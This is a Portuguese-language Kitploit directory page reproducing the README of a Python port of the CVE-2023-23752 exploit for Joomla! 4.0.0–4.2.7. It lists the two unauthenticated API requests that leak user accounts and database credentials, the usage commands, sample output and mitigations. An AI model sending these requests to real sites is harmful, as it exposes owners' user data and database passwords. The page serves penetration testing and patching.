Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-23752 — Porte em Python do exploit CVE-2023-23752 — Joomla! < 4.2.8 divulgação de informações não autenticada (lista de usuários + vazamento de credenciais do banco de dados) | Kitploit
Ferramentas/GitHubGitHub/bardlaudian/cve-2023-23752
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubbardlaudian/cve-2023-23752

CVE-2023-23752

Porte em Python do exploit CVE-2023-23752 — Joomla! < 4.2.8 divulgação de informações não autenticada (lista de usuários + vazamento de credenciais do banco de dados)

Ver Repositório
9há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-23752 — Joomla! < 4.2.8 Divulgação de Informações Não Autenticada

Python CVE Platform

⚠️ Aviso: Esta ferramenta é destinada apenas para fins educacionais e testes de penetração autorizados. Use-a apenas contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar. O uso não autorizado é ilegal.


Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Como Funciona
  • Requisitos
  • Instalação
  • Uso
  • Exemplos
  • Mitigações
  • Créditos
  • Referências

Visão Geral

O Joomla! é um dos sistemas de gerenciamento de conteúdo (CMS) de código aberto mais amplamente utilizados. As versões 4.0.0 a 4.2.7 expõem dois endpoints de API sem controle de acesso adequado, permitindo que um invasor não autenticado recupere informações sensíveis: contas de usuário registradas e, em configurações vulneráveis, as credenciais do banco de dados do site.

A vulnerabilidade foi descoberta por Zewei Zhang do NSFOCUS TIANJI Lab e divulgada ao projeto Joomla!, que lançou um patch na versão 4.2.8. Foi atribuído CVE-2023-23752.

Este repositório contém uma portabilidade para Python do exploit Ruby original lançado pela ACCEIS.


Detalhes da Vulnerabilidade

CampoValor
CVECVE-2023-23752
AfetadoJoomla! 4.0.0 – 4.2.7
TipoControle de Acesso Incorreto / Divulgação de Informações
PrivilégiosNenhum (não autenticado)
ImpactoDivulgação de contas de usuário e credenciais do banco de dados
PatchJoomla! 4.2.8 (lançado em 2023)

Como Funciona

Os endpoints do serviço web da API REST do Joomla! devem aplicar autenticação e verificações de acesso antes de retornar dados. Nas versões afetadas, dois endpoints falham ao realizar essa verificação corretamente quando chamados com o parâmetro de consulta public=true, tratando a solicitação como se viesse de um nível de acesso "público" anônimo que deveria expor apenas dados não sensíveis — mas, em vez disso, vaza informações internas.

Os Endpoints Vulneráveis

GET /api/index.php/v1/users?public=true
GET /api/index.php/v1/config/application?public=true
  • O endpoint users retorna a lista completa de contas registradas: id, nome de exibição, nome de usuário, email e associação a grupos.
  • O endpoint config retorna a configuração da aplicação, incluindo — quando o instalador não foi removido/endurecido — o host do banco de dados, usuário, senha, nome do banco, prefixo e configurações de criptografia.

Fluxo do Exploit

O script automatiza os seguintes passos:

1. Enviar solicitação GET para /api/index.php/v1/users?public=true
2. Analisar a resposta JSON:API e extrair registros de usuários
3. Enviar solicitação GET para /api/index.php/v1/config/application?public=true
4. Analisar a resposta JSON:API e extrair configurações do site + banco de dados
5. Imprimir ambos os conjuntos de dados no console

Nenhuma autenticação, sessão ou token CSRF é necessário em nenhum momento — todo o ataque consiste em duas solicitações GET não autenticadas.


Requisitos

  • Python 3.8+
  • requests
pip install requests --break-system-packages

Instalação

git clone https://github.com/BardLaudian/CVE-2023-23752.git
cd CVE-2023-23752
pip install requests --break-system-packages

Uso

usage: CVE-2023-23752.py [-h] url

positional arguments:
  url         URL base do alvo, ex.: http://dev.devvortex.htb

options:
  -h, --help  mostra esta mensagem de ajuda e sai

Exemplos

Uso básico

python3 CVE-2023-23752.py http://127.0.0.1:4242

Contra um alvo estilo HTB

python3 CVE-2023-23752.py http://dev.devvortex.htb

Exemplo de saída

=== Usuários ===
  [123] Administrator (admin) - [email protected] - ['Super Users']

=== Informações do site ===
  Nome do site: My Site
  Editor: tinymce
  Captcha: 0
  Acesso: 1
  Status de debug: False

=== Informações do banco de dados ===
  Tipo de BD: mysqli
  Host do BD: localhost
  Usuário do BD: joomla_user
  Senha do BD: ********
  Nome do BD: joomla_db
  Prefixo do BD: sd8f2_
  Criptografia do BD: 0

Mitigações

  • Atualize o Joomla! para a versão 4.2.8 ou superior — esta é a única correção completa.
  • Restrinja o acesso a /api/index.php/* no servidor web ou WAF se a atualização não for possível imediatamente.
  • Rotacione as credenciais de quaisquer contas ou usuários de banco de dados que possam ter sido expostos por este endpoint antes da aplicação do patch.
  • Monitore os logs de acesso em busca de solicitações não autenticadas para os caminhos do serviço web /api/index.php/v1/.

Créditos

  • Vulnerabilidade descoberta por: Zewei Zhang, NSFOCUS TIANJI Lab
  • Exploit original (Ruby): noraj (Alexandre ZANNI) pela ACCEIS — repositório original
  • Portabilidade para Python: Bardlaudian

Referências

  • NVD — CVE-2023-23752
  • Exploit-DB — EDB-51334
  • Aviso PacketStorm
  • Aviso de Segurança Joomla!
  • Aviso do Descobridor — NSFOCUS
  • Exploit Ruby Original — Acceis
Baixar ferramenta